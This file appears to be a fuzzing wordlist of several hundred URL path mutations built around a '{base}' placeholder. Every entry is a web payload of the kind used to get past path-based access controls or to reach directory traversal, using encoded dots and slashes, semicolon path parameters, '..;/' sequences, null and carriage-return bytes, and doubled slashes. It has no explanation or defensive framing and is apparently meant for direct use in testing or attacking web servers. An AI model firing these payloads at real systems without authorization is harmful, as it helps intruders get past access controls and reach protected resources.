/%20/{base}/%20
/%20/{base}/%20/
/%2e/{base}
/%2e/{base}/
/*/{base}
/*/{base}/
/..;/{base}
/..;/{base}/
/./{base}
/./{base}/
/./{base}/./
/.;/{base}
/.;/{base}/
///{base}///
//;//{base}
//;//{base}/
//{base}//
/;/{base}
/;/{base}/
{base}
{base}#
{base}#?
{base}%00
{base}%09
{base}%09%3b
{base}%09..
{base}%09;
{base}%20
{base}%23
{base}%23%3f
{base}%252f%252f
{base}%252f/
{base}%2e%2e
{base}%2e%2e/
{base}%2f
{base}%2f%20%23
{base}%2f%23
{base}%2f%2f
{base}%2f%2f%2f
{base}%2f%3b%2f
{base}%2f%3b%2f%2f
{base}%2f%3f
{base}%2f%3f/
{base}%2f/
{base}%2f/%2f
{base}%2f//
{base}%2f;?
{base}%2f?;
{base}%3b
{base}%3b%09
{base}%3b%2f%2e%2e
{base}%3b%2f%2e%2e%2f%2e%2e%2f%2f
{base}%3b%2f%2e.
{base}%3b%2f..
{base}%3b/%2e%2e/..%2f%2f
{base}%3b/%2e.
{base}%3b/%2f%2f../
{base}%3b/..
{base}%3b//%2f../
{base}%3f%23
{base}%3f%3f
{base}%3f.php
{base}..
{base}..%00/
{base}..%00/;
{base}..%00;/
{base}..%09
{base}..%0d/
{base}..%0d/;
{base}..%0d;/
{base}..%5c/
{base}..%ff/
{base}..%ff/;
{base}..%ff;/
{base}../
{base}..;%00/
{base}..;%0d/
{base}..;%ff/
{base}..;/
{base}..;\
{base}..;\;
{base}..\
{base}..\;
{base}.css
{base}.html
{base}.json
{base}/
{base}/#
{base}/#/
{base}/#/./
{base}/%09
{base}/%09/
{base}/%0a
{base}/%0a/
{base}/%0d
{base}/%0d/
{base}/%20
{base}/%20#
{base}/%20%23
{base}/%20/
{base}/%23
{base}/%23/
{base}/%25
{base}/%25/
{base}/%252e%252e%252f/
{base}/%252e%252e%253b/
{base}/%252e%252f/
{base}/%252e%253b/
{base}/%252e/
{base}/%252f
{base}/%26
{base}/%26/
{base}/%2e%2e
{base}/%2e%2e%2f/
{base}/%2e%2e%3b/
{base}/%2e%2e/
{base}/%2e%2f/
{base}/%2e%3b/
{base}/%2e%3b//
{base}/%2e/
{base}/%2e//
{base}/%2f
{base}/%2f/
{base}/%3b/
{base}/%3f
{base}/%3f/
{base}/&
{base}/*
{base}/-
{base}/.
{base}/..
{base}/..%2f
{base}/..%2f..%2f
{base}/..%2f..%2f..%2f
{base}/..%3B/
{base}/../
{base}/../../
{base}/../../../
{base}/../../..//
{base}/../..//
{base}/../..//../
{base}/../..;/
{base}/.././../
{base}/../.;/../
{base}/..//
{base}/..//../
{base}/..//../../
{base}/..//..;/
{base}/../;/
{base}/../;/../
{base}/..;%2f
{base}/..;%2f..;%2f
{base}/..;%2f..;%2f..;%2f
{base}/..;/
{base}/..;/../
{base}/..;/..;/
{base}/..;//
{base}/..;//../
{base}/..;//..;/
{base}/..;/;/
{base}/..;/;/..;/
{base}/..\;/
{base}/./
{base}/.//
{base}/.;/
{base}/.;//
{base}/.json
{base}//
{base}//%2f
{base}//*
{base}//..
{base}//../../
{base}//..;
{base}//./
{base}//.;/
{base}///
{base}///..
{base}///../
{base}///..//
{base}///..;
{base}///..;/
{base}///..;//
{base}//;/
{base}/;%2f..%2f..%2f
{base}/;/
{base}/;//
{base}/;?
{base}/;{base}
{base}/;{base}/
{base}/?
{base}/?/
{base}/?;
{base}/??
{base}/??/
{base}/{base}/../
{base}/{base}/..//
{base}/{base}/../;/
{base}/{base}/..;/
{base}/{base}/..;//
{base}/{base}/..;/;/
{base}/{base}//../
{base}/{base}//..;/
{base}/{base}/;/../
{base}/{base}/;/..;/
{base}/~
{base}/Â°/
{base};
{base};%09
{base};%09..
{base};%09..;
{base};%09;
{base};%2f%2e%2e
{base};%2f%2e%2e%2f%2e%2e%2f%2f
{base};%2f%2f/../
{base};%2F..
{base};%2f..
{base};%2f..%2f%2e%2e%2f%2f
{base};%2f..%2f..%2f%2f
{base};%2f..%2f/
{base};%2f..%2f/..%2f
{base};%2f..%2f/../
{base};%2f../%2f..%2f
{base};%2f../%2f../
{base};%2f..//..%2f
{base};%2f..//../
{base};%2f..///
{base};%2f..///;
{base};%2f..//;/
{base};%2f..//;/;
{base};%2f../;//
{base};%2f../;/;/
{base};%2f../;/;/;
{base};%2f..;///
{base};%2f..;//;/
{base};%2f..;/;//
{base};%2f/%2f../
{base};%2f//..%2f
{base};%2f//../
{base};%2f//..;/
{base};%2f/;/../
{base};%2f/;/..;/
{base};%2f;//../
{base};%2f;/;/..;/
{base};/
{base};/%2e%2e
{base};/%2e%2e%2f%2f
{base};/%2e%2e%2f/
{base};/%2e%2e/
{base};/%2e.
{base};/%2f%2f../
{base};/%2f/..%2f
{base};/%2f/../
{base};/.%2e
{base};/.%2e/%2e%2e/%2f
{base};/..
{base};/..%2f
{base};/..%2f%2f../
{base};/..%2f..%2f
{base};/..%2f/
{base};/..%2f//
{base};/../
{base};/../%2f/
{base};/../../
{base};/../..//
{base};/.././../
{base};/../.;/../
{base};/..//
{base};/..//%2e%2e/
{base};/..//%2f
{base};/..//../
{base};/..///
{base};/../;/
{base};/../;/../
{base};/..;
{base};/.;.
{base};//%2f../
{base};//..
{base};//../../
{base};///..
{base};///../
{base};///..//
{base};?
{base};{base}
{base};{base}/
{base};{base};
{base}?
{base}?#
{base}?.php
{base}?;
{base}??
{base}?id=1
{base}\/\/
{base}~
